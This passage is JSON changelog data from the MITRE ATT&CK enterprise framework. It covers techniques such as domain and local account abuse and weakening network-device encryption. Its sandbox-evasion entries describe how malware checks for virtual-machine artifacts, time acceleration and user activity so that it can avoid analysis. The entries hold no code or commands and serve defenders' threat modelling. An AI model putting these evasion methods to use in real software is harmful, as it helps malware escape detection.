                            "description": "Amazon. (n.d.). AWS Account Root User. Retrieved April 5, 2021.",
                            "url": "https://docs.aws.amazon.com/IAM/latest/UserGuide/id_root-user.html"
                        },
                        {
                            "source_name": "Microsoft Local Accounts Feb 2019",
                            "description": "Microsoft. (2018, December 9). Local Accounts. Retrieved February 11, 2019.",
                            "url": "https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/local-accounts"
                        },
                        {
                            "source_name": "Metasploit SSH Module",
                            "description": "undefined. (n.d.). Retrieved April 12, 2019.",
                            "url": "https://github.com/rapid7/metasploit-framework/tree/master/modules/exploits/linux/ssh"
                        },
                        {
                            "source_name": "Threat Matrix for Kubernetes",
                            "description": "Weizman, Y. (2020, April 2). Threat Matrix for Kubernetes. Retrieved March 30, 2021.",
                            "url": "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/"
                        },
                        {
                            "source_name": "Pentera vCenter Information Disclosure",
                            "description": "Yuval Lazar. (2022, March 29). Mitigating VMware vCenter Information Disclosure. Retrieved March 26, 2025.",
                            "url": "https://pentera.io/blog/information-disclosure-in-vmware-vcenter/"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Janantha Marasinghe"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Containers",
                        "ESXi",
                        "IaaS",
                        "Identity Provider",
                        "Linux",
                        "macOS",
                        "Network Devices",
                        "Office Suite",
                        "SaaS",
                        "Windows"
                    ],
                    "x_mitre_version": "2.0",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-15 22:50:51.753000+00:00\", \"old_value\": \"2025-10-24 17:48:51.181000+00:00\"}, \"root['kill_chain_phases'][0]['phase_name']\": {\"new_value\": \"stealth\", \"old_value\": \"defense-evasion\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.0\", \"old_value\": \"1.5\"}}}",
                    "previous_version": "1.5",
                    "version_change": "1.5 \u2192 2.0",
                    "changelog_mitigations": {
                        "shared": [
                            "M1027: Password Policies",
                            "M1032: Multi-factor Authentication"
                        ],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0465: Detection of Default Account Abuse Across Platforms"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--c3d4bdd9-2cfe-4a80-9d0c-07a29ecdce8f",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2020-03-13 20:21:54.758000+00:00",
                    "modified": "2026-04-15 22:50:57.880000+00:00",
                    "name": "Domain Accounts",
                    "description": "Adversaries may obtain and abuse credentials of a domain account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion.(Citation: TechNet Credential Theft) Domain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain. Domain accounts can cover users, administrators, and services.(Citation: Microsoft AD Accounts)\n\nAdversaries may compromise domain accounts, some with a high level of privileges, through various means such as [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) or password reuse, allowing access to privileged resources of the domain.",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "stealth"
                        },
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "persistence"
                        },
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "privilege-escalation"
                        },
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "initial-access"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1078/002",
                            "external_id": "T1078.002"
                        },
                        {
                            "source_name": "TechNet Credential Theft",
                            "description": "Microsoft. (2016, April 15). Attractive Accounts for Credential Theft. Retrieved June 3, 2016.",
                            "url": "https://technet.microsoft.com/en-us/library/dn535501.aspx"
                        },
                        {
                            "source_name": "Microsoft AD Accounts",
                            "description": "Microsoft. (2019, August 23). Active Directory Accounts. Retrieved March 13, 2020.",
                            "url": "https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/active-directory-accounts"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Jon Sternstein, Stern Security"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "ESXi",
                        "Linux",
                        "macOS",
                        "Windows"
                    ],
                    "x_mitre_version": "2.0",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-15 22:50:57.880000+00:00\", \"old_value\": \"2025-10-24 17:49:21.034000+00:00\"}, \"root['kill_chain_phases'][0]['phase_name']\": {\"new_value\": \"stealth\", \"old_value\": \"defense-evasion\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.0\", \"old_value\": \"1.5\"}}, \"iterable_item_removed\": {\"root['external_references'][2]\": {\"source_name\": \"TechNet Audit Policy\", \"description\": \"Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved June 3, 2016.\", \"url\": \"https://technet.microsoft.com/en-us/library/dn487457.aspx\"}, \"root['external_references'][4]\": {\"source_name\": \"Ubuntu SSSD Docs\", \"description\": \"Ubuntu. (n.d.). SSSD. Retrieved September 23, 2021.\", \"url\": \"https://ubuntu.com/server/docs/service-sssd\"}}}",
                    "previous_version": "1.5",
                    "version_change": "1.5 \u2192 2.0",
                    "changelog_mitigations": {
                        "shared": [
                            "M1017: User Training",
                            "M1018: User Account Management",
                            "M1026: Privileged Account Management",
                            "M1027: Password Policies",
                            "M1032: Multi-factor Authentication"
                        ],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0210: Abuse of Domain Accounts"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--fdc47f44-dd32-4b99-af5f-209f556f63c2",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2020-03-13 20:26:46.695000+00:00",
                    "modified": "2026-04-15 22:51:08.702000+00:00",
                    "name": "Local Accounts",
                    "description": "Adversaries may obtain and abuse credentials of a local account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Local accounts are those configured by an organization for use by users, remote support, services, or for administration on a single system or service.\n\nLocal Accounts may also be abused to elevate privileges and harvest credentials through [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). Password reuse may allow the abuse of local accounts across a set of machines on a network for the purposes of Privilege Escalation and Lateral Movement. ",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "stealth"
                        },
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "persistence"
                        },
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "privilege-escalation"
                        },
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "initial-access"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1078/003",
                            "external_id": "T1078.003"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Containers",
                        "ESXi",
                        "Linux",
                        "macOS",
                        "Network Devices",
                        "Windows"
                    ],
                    "x_mitre_version": "2.0",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-15 22:51:08.702000+00:00\", \"old_value\": \"2025-10-24 17:49:39.874000+00:00\"}, \"root['kill_chain_phases'][0]['phase_name']\": {\"new_value\": \"stealth\", \"old_value\": \"defense-evasion\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.0\", \"old_value\": \"1.5\"}}}",
                    "previous_version": "1.5",
                    "version_change": "1.5 \u2192 2.0",
                    "changelog_mitigations": {
                        "shared": [
                            "M1018: User Account Management",
                            "M1026: Privileged Account Management",
                            "M1027: Password Policies",
                            "M1032: Multi-factor Authentication"
                        ],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0407: Detection of Local Account Abuse for Initial Access and Persistence"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--82caa33e-d11a-433a-94ea-9b5a5fbef81d",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2019-04-17 22:22:24.505000+00:00",
                    "modified": "2026-04-15 22:52:12.932000+00:00",
                    "name": "Virtualization/Sandbox Evasion",
                    "description": "Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.(Citation: Deloitte Environment Awareness)\n\nAdversaries may use several methods to accomplish [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) such as checking for security monitoring tools (e.g., Sysinternals, Wireshark, etc.) or other system artifacts associated with analysis or virtualization. Adversaries may also check for legitimate user activity to help determine if it is in an analysis environment. Additional methods include use of sleep timers or loops within malware code to avoid operating within a temporary sandbox.(Citation: Unit 42 Pirpi July 2015)\n\n",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "stealth"
                        },
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "discovery"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1497",
                            "external_id": "T1497"
                        },
                        {
                            "source_name": "Unit 42 Pirpi July 2015",
                            "description": "Falcone, R., Wartell, R.. (2015, July 27). UPS: Observations on CVE-2015-3113, Prior Zero-Days and the Pirpi Payload. Retrieved April 23, 2019.",
                            "url": "https://unit42.paloaltonetworks.com/ups-observations-on-cve-2015-3113-prior-zero-days-and-the-pirpi-payload/"
                        },
                        {
                            "source_name": "Deloitte Environment Awareness",
                            "description": "Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved September 13, 2024.",
                            "url": "https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Deloitte Threat Library Team",
                        "Sunny Neo"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": false,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Linux",
                        "macOS",
                        "Windows"
                    ],
                    "x_mitre_version": "2.0",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-15 22:52:12.932000+00:00\", \"old_value\": \"2025-10-24 17:49:02.638000+00:00\"}, \"root['kill_chain_phases'][0]['phase_name']\": {\"new_value\": \"stealth\", \"old_value\": \"defense-evasion\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.0\", \"old_value\": \"1.4\"}}}",
                    "previous_version": "1.4",
                    "version_change": "1.4 \u2192 2.0",
                    "changelog_mitigations": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0046: Detection Strategy for T1497 Virtualization/Sandbox Evasion"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--29be378d-262d-4e99-b00d-852d573628e6",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2020-03-06 20:57:37.959000+00:00",
                    "modified": "2026-04-15 22:51:53.404000+00:00",
                    "name": "System Checks",
                    "description": "Adversaries may employ various system checks to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.(Citation: Deloitte Environment Awareness)\n\nSpecific checks will vary based on the target and/or adversary, but may involve behaviors such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047), [PowerShell](https://attack.mitre.org/techniques/T1059/001), [System Information Discovery](https://attack.mitre.org/techniques/T1082), and [Query Registry](https://attack.mitre.org/techniques/T1012) to obtain system information and search for VME artifacts. Adversaries may search for VME artifacts in memory, processes, file system, hardware, and/or the Registry. Adversaries may use scripting to automate these checks  into one script and then have the program exit if it determines the system to be a virtual environment. \n\nChecks could include generic system properties such as host/domain name and samples of network traffic. Adversaries may also check the network adapters addresses, CPU core count, and available memory/drive size. Once executed, malware may also use [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) to check if it was saved in a folder or file with unexpected or even analysis-related naming artifacts such as `malware`, `sample`, or `hash`.\n\nOther common checks may enumerate services running that are unique to these applications, installed programs on the system, manufacturer/product fields for strings relating to virtual machine applications, and VME-specific hardware/processor instructions.(Citation: McAfee Virtual Jan 2017) In applications like VMWare, adversaries can also use a special I/O port to send commands and receive output. \n \nHardware checks, such as the presence of the fan, temperature, and audio devices, could also be used to gather evidence that can be indicative a virtual environment. Adversaries may also query for specific readings from these devices.(Citation: Unit 42 OilRig Sept 2018)",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "stealth"
                        },
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "discovery"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1497/001",
                            "external_id": "T1497.001"
                        },
                        {
                            "source_name": "Unit 42 OilRig Sept 2018",
                            "description": "Falcone, R., et al. (2018, September 04). OilRig Targets a Middle Eastern Government and Adds Evasion Techniques to OopsIE. Retrieved September 24, 2018.",
                            "url": "https://researchcenter.paloaltonetworks.com/2018/09/unit42-oilrig-targets-middle-eastern-government-adds-evasion-techniques-oopsie/"
                        },
                        {
                            "source_name": "McAfee Virtual Jan 2017",
                            "description": "Roccia, T. (2017, January 19). Stopping Malware With a Fake Virtual Machine. Retrieved April 17, 2019.",
                            "url": "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/stopping-malware-fake-virtual-machine/"
                        },
                        {
                            "source_name": "Deloitte Environment Awareness",
                            "description": "Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved September 13, 2024.",
                            "url": "https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Deloitte Threat Library Team",
                        "Kostya Vasilkov"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Linux",
                        "macOS",
                        "Windows"
                    ],
                    "x_mitre_version": "3.0",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-15 22:51:53.404000+00:00\", \"old_value\": \"2025-10-24 17:48:33.591000+00:00\"}, \"root['kill_chain_phases'][0]['phase_name']\": {\"new_value\": \"stealth\", \"old_value\": \"defense-evasion\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"3.0\", \"old_value\": \"2.3\"}}}",
                    "previous_version": "2.3",
                    "version_change": "2.3 \u2192 3.0",
                    "changelog_mitigations": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0168: Virtualization/Sandbox Evasion via System Checks across Windows, Linux, macOS"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--4bed873f-0b7d-41d4-b93a-b6905d1f90b0",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2020-03-06 21:11:11.225000+00:00",
                    "modified": "2026-04-15 22:52:39.442000+00:00",
                    "name": "Time Based Checks",
                    "description": "Adversaries may employ various time-based methods to detect virtualization and analysis environments, particularly those that attempt to manipulate time mechanisms to simulate longer elapses of time. This may include enumerating time-based properties, such as uptime or the system clock. \n\nAdversaries may use calls like `GetTickCount` and `GetSystemTimeAsFileTime` to discover if they are operating within a virtual machine or sandbox, or may be able to identify a sandbox accelerating time by sampling and calculating the expected value for an environment's timestamp before and after execution of a sleep function.(Citation: ISACA Malware Tricks)",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "stealth"
                        },
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "discovery"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1497/003",
                            "external_id": "T1497.003"
                        },
                        {
                            "source_name": "ISACA Malware Tricks",
                            "description": "Kolbitsch, C. (2017, November 1). Evasive Malware Tricks: How Malware Evades Detection by Sandboxes. Retrieved March 30, 2021.",
                            "url": "https://www.isaca.org/resources/isaca-journal/issues/2017/volume-6/evasive-malware-tricks-how-malware-evades-detection-by-sandboxes"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Deloitte Threat Library Team",
                        "Jeff Felling, Red Canary",
                        "Jorge Orchilles, SCYTHE",
                        "Ruben Dodge, @shotgunner101"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Linux",
                        "macOS",
                        "Windows"
                    ],
                    "x_mitre_version": "3.0",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-15 22:52:39.442000+00:00\", \"old_value\": \"2025-10-24 17:48:44.870000+00:00\"}, \"root['kill_chain_phases'][0]['phase_name']\": {\"new_value\": \"stealth\", \"old_value\": \"defense-evasion\"}, \"root['x_mitre_version']\": {\"new_value\": \"3.0\", \"old_value\": \"2.0\"}}}",
                    "previous_version": "2.0",
                    "version_change": "2.0 \u2192 3.0",
                    "changelog_mitigations": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0141: Detect Time-Based Evasion via Sleep, Timer Loops, and Delayed Execution"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--91541e7e-b969-40c6-bbd8-1b5352ec2938",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2020-03-06 21:04:12.454000+00:00",
                    "modified": "2026-04-15 22:52:22.149000+00:00",
                    "name": "User Activity Based Checks",
                    "description": "Adversaries may employ various user activity checks to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.(Citation: Deloitte Environment Awareness)\n\nAdversaries may search for user activity on the host based on variables such as the speed/frequency of mouse movements and clicks (Citation: Sans Virtual Jan 2016) , browser history, cache, bookmarks, or number of files in common directories such as home or the desktop. Other methods may rely on specific user interaction with the system before the malicious code is activated, such as waiting for a document to close before activating a macro (Citation: Unit 42 Sofacy Nov 2018) or waiting for a user to double click on an embedded image to activate.(Citation: FireEye FIN7 April 2017) ",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "stealth"
                        },
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "discovery"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1497/002",
                            "external_id": "T1497.002"
                        },
                        {
                            "source_name": "FireEye FIN7 April 2017",
                            "description": "Carr, N., et al. (2017, April 24). FIN7 Evolution and the Phishing LNK. Retrieved April 24, 2017.",
                            "url": "https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html"
                        },
                        {
                            "source_name": "Unit 42 Sofacy Nov 2018",
                            "description": "Falcone, R., Lee, B.. (2018, November 20). Sofacy Continues Global Attacks and Wheels Out New \u2018Cannon\u2019 Trojan. Retrieved April 23, 2019.",
                            "url": "https://unit42.paloaltonetworks.com/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan/"
                        },
                        {
                            "source_name": "Sans Virtual Jan 2016",
                            "description": "Keragala, D. (2016, January 16). Detecting Malware and Sandbox Evasion Techniques. Retrieved April 17, 2019.",
                            "url": "https://www.sans.org/reading-room/whitepapers/forensics/detecting-malware-sandbox-evasion-techniques-36667"
                        },
                        {
                            "source_name": "Deloitte Environment Awareness",
                            "description": "Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved September 13, 2024.",
                            "url": "https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Deloitte Threat Library Team"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Linux",
                        "macOS",
                        "Windows"
                    ],
                    "x_mitre_version": "2.0",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-15 22:52:22.149000+00:00\", \"old_value\": \"2025-10-24 17:49:06.305000+00:00\"}, \"root['kill_chain_phases'][0]['phase_name']\": {\"new_value\": \"stealth\", \"old_value\": \"defense-evasion\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.0\", \"old_value\": \"1.2\"}}}",
                    "previous_version": "1.2",
                    "version_change": "1.2 \u2192 2.0",
                    "changelog_mitigations": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0420: Detect User Activity Based Sandbox Evasion via Input & Artifact Probing"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--1f9012ef-1e10-4e48-915e-e03563435fe8",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2020-10-19 18:47:08.759000+00:00",
                    "modified": "2026-04-16 20:07:53.046000+00:00",
                    "name": "Weaken Encryption",
                    "description": "Adversaries may compromise a network device\u2019s encryption capability in order to bypass encryption that would otherwise protect data communications.(Citation: Cisco Synful Knock Evolution)\n\nEncryption can be used to protect transmitted network traffic to maintain its confidentiality (protect against unauthorized disclosure) and integrity (protect against unauthorized changes). Encryption ciphers are used to convert a plaintext message to ciphertext and can be computationally intensive to decipher without the associated decryption key. Typically, longer keys increase the cost of cryptanalysis, or decryption without the key.\n\nAdversaries can compromise and manipulate devices that perform encryption of network traffic. For example, through behaviors such as [Modify System Image](https://attack.mitre.org/techniques/T1601), [Reduce Key Space](https://attack.mitre.org/techniques/T1600/001), and [Disable Crypto Hardware](https://attack.mitre.org/techniques/T1600/002), an adversary can negatively effect and/or eliminate a device\u2019s ability to securely encrypt network traffic. This poses a greater risk of unauthorized disclosure and may help facilitate data manipulation, Credential Access, or Collection efforts.(Citation: Cisco Blog Legacy Device Attacks)",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "defense-impairment"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1600",
                            "external_id": "T1600"
                        },
                        {
                            "source_name": "Cisco Synful Knock Evolution",
                            "description": "Graham Holmes. (2015, October 8). Evolution of attacks on Cisco IOS devices. Retrieved October 19, 2020.",
                            "url": "https://blogs.cisco.com/security/evolution-of-attacks-on-cisco-ios-devices"
                        },
                        {
                            "source_name": "Cisco Blog Legacy Device Attacks",
                            "description": "Omar Santos. (2020, October 19). Attackers Continue to Target Legacy Devices. Retrieved October 20, 2020.",
                            "url": "https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": false,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Network Devices"
                    ],
                    "x_mitre_version": "2.0",
